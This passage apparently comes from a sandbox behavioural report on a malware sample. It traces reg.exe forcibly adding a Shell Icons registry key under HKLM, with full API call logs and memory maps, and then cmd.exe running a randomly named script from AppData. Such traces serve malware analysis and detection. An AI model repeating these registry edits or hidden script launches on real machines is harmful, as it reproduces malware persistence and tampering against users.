lpBuffer=0x0) returned 0x25 [0116.658] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0116.658] ExitProcess (uExitCode=0x0) Process: id = "53" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x7ea166c0" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" 
monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0xd8c" cmd_line = "reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8103 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8104 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8105 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8106 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8107 start_va = 0xab0000 end_va = 0xb01fff entry_point = 0xab0000 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 8108 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8109 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8110 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8111 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 8112 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8217 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8218 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8219 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8220 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8221 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 8222 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8223 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8224 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8225 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" 
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8226 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8227 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8228 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8229 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8230 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8231 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8232 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8233 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8234 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 
region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8235 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8246 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 8247 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8248 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8249 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 8250 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 8251 start_va = 0x2f0000 end_va = 0x2f8fff entry_point = 0x2f0000 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\System32\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\reg.exe.mui") Region: id = 8252 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8253 start_va = 0x320000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 8254 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 8255 start_va = 0xb10000 end_va = 0x170ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000b10000" filename = "" Region: id = 8256 start_va = 0x440000 end_va = 0x70efff entry_point = 0x440000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8264 start_va = 0x710000 end_va = 0x7cffff entry_point = 0x710000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 84 os_tid = 0xe20 [0116.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afcbc | out: lpSystemTimeAsFileTime=0x1afcbc*(dwLowDateTime=0x82acdae0, dwHighDateTime=0x1d440a9)) [0116.377] GetCurrentProcessId () returned 0xe1c [0116.377] GetCurrentThreadId () returned 0xe20 [0116.377] GetTickCount () returned 0x279a1 [0116.377] QueryPerformanceCounter (in: lpPerformanceCount=0x1afcb4 | out: lpPerformanceCount=0x1afcb4*=17316651353) returned 1 [0116.378] GetModuleHandleA (lpModuleName=0x0) returned 0xab0000 [0116.378] __set_app_type (_Type=0x1) [0116.378] __p__fmode () returned 0x76b331f4 [0116.378] __p__commode () returned 0x76b331fc [0116.378] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xabd4f9) returned 0x0 [0116.378] __wgetmainargs (in: _Argc=0xabf030, _Argv=0xabf038, _Env=0xabf034, _DoWildCard=0, _StartInfo=0xabf010 | out: _Argc=0xabf030, _Argv=0xabf038, _Env=0xabf034) returned 0 [0116.379] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0116.379] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.380] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x1afc3c | out: phkResult=0x1afc3c*=0x0) returned 0x2 [0116.380] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, 
lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.380] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0116.380] lstrlenW (lpString="") returned 0 [0116.380] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.381] _memicmp (_Buf1=0x7e108, _Buf2=0xab1318, _Size=0x7) returned 0 [0116.381] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.381] _memicmp (_Buf1=0x7e120, _Buf2=0xab1318, _Size=0x7) returned 0 [0116.381] _vsnwprintf (in: _Buffer=0x80e68, _BufferCount=0xe, _Format="|%s|", _ArgList=0x1afb58 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0116.381] _vsnwprintf (in: _Buffer=0x81fa8, _BufferCount=0x46, _Format="|%s|", _ArgList=0x1afb58 | out: _Buffer="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.381] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0116.381] lstrlenW (lpString="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.381] SetLastError (dwErrCode=0x490) [0116.381] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.381] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.381] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 
[0116.382] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", 
wMatch=0x72) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0116.382] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0116.383] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.383] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.383] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.383] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0116.383] lstrlenW 
(lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.383] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.383] StrChrIW (lpStart="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.398] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0116.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0116.398] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.398] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.398] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.398] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.399] lstrlenW 
(lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\CurrentVersion\\Explorer\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Explorer\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Explorer\\Shell Icons", wMatch=0x5c) returned="\\Shell Icons" [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] StrChrIW (lpStart="Shell Icons", wMatch=0x5c) returned 0x0 [0116.399] SetLastError (dwErrCode=0x490) [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] SetLastError (dwErrCode=0x0) [0116.399] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, 
dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0116.399] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0116.400] SetLastError (dwErrCode=0x0) [0116.400] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x1afbec, lpdwDisposition=0x1afbc4 | out: phkResult=0x1afbec*=0x50, lpdwDisposition=0x1afbc4*=0x1) returned 0x0 [0116.400] RegQueryValueExW (in: hKey=0x50, lpValueName="", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0116.400] lstrlenW (lpString="") returned 0 [0116.400] RegSetValueExW (in: hKey=0x50, lpValueName="", Reserved=0x0, dwType=0x1, lpData="", cbData=0x2 | out: lpData="") returned 0x0 [0116.400] RegCloseKey (hKey=0x50) returned 0x0 [0116.401] SetLastError (dwErrCode=0x0) [0116.401] GetLastError () returned 0x0 [0116.401] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1afb98, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x2040\x08\xfba4\x1a\x3176\xab\xfc60\x1a\x3753\xab") returned 0x27 [0116.401] GetLastError () returned 0x0 [0116.401] lstrlenW 
(lpString="The operation completed successfully.\r\n") returned 39 [0116.401] SetLastError (dwErrCode=0x0) [0116.402] LocalFree (hMem=0x82040) returned 0x0 [0116.402] __iob_func () returned 0x76b32900 [0116.402] _fileno (_File=0x76b32920) returned 1 [0116.402] _errno () returned 0x3107d8 [0116.402] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.402] _errno () returned 0x3107d8 [0116.402] GetFileType (hFile=0x7) returned 0x2 [0116.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.402] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afb58 | out: lpMode=0x1afb58) returned 1 [0116.402] __iob_func () returned 0x76b32900 [0116.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.402] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0116.402] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x821f8*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x1afb80, lpReserved=0x0 | out: lpBuffer=0x821f8*, lpNumberOfCharsWritten=0x1afb80*=0x27) returned 1 [0116.405] exit (_Code=0) Process: id = "54" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0xde8" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8093 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 8094 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8095 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8096 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8097 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8098 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8099 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8100 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8101 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8102 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8380 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8381 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8382 start_va = 0x50000 end_va = 0xb6fff 
entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8383 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 8384 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 8385 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8386 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8387 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8388 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = 